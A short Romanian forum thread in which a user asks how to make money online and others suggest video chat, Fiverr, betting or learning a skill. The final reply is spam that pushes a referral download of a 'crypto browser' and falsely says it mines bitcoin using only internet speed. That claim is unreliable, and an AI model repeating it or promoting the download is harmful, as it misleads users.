| anonim_4396 a întrebat:

Buna ziua TPU. Vreau si eu ceva idei cum sa faci bani online, are cineva vreo idee?

7 răspunsuri:
| Simpatic a răspuns:

Video-chat si e metoda pe care o fac toti taranii acumwinking

| simulare a răspuns (pentru Simpatic):

Nu sunt fata sad

| Violleta2022 a răspuns:

Videochat

sadrian46
| sadrian46 a răspuns:

Intrebarea aceasta a mai fost pusă de 100 de ori aici. Răspunsul este simplu. Și online banii nu se fac ci se câștigă, dacă știi să faci ceva, ceea ce poți să faci la tine acasă pe calculator, ca să poți presta apoi un serviciu cerut de cineva online.
Prietenul tău Google îți va spune care sunt cele cam 100 de oportunități. Să câștigi, iar nu să faci bani.

| GabiDumitrescu a răspuns:

G2.com pentru primii 25 de dolari in maxim 3 ore, daca te duce capul un pic. Daca nu, ghinion. P.S. Stii sa faci ceva practic cu calculatorul ala, sau doar ai net, PC, si ai auzit ca se pot face bani in conditiile astea?

| mitzok a răspuns:

Videochat, pariuri, fiverr

| bNkNz1 a răspuns:

Mineaza bitcoin acum cel mai usor posibil!
Tot ce trebuie sa faci este sa descarci acest browser: https://get.cryptobrowser.site/12738006
Dupa ce il instalezi si iti faci un cont, acesta v-a incepe sa mineze pentru tine datorita vitezei internetului.
NU FOLOSESTE PUTEREA CALCULATORULUI, DOAR VITEZA DE INTERNET.
Acest browser a fost creat pe bazele chromului. Simplu si usor nu trebuie sa faci nimic decat "sa pierzi vremea pe net", accesand acest browser.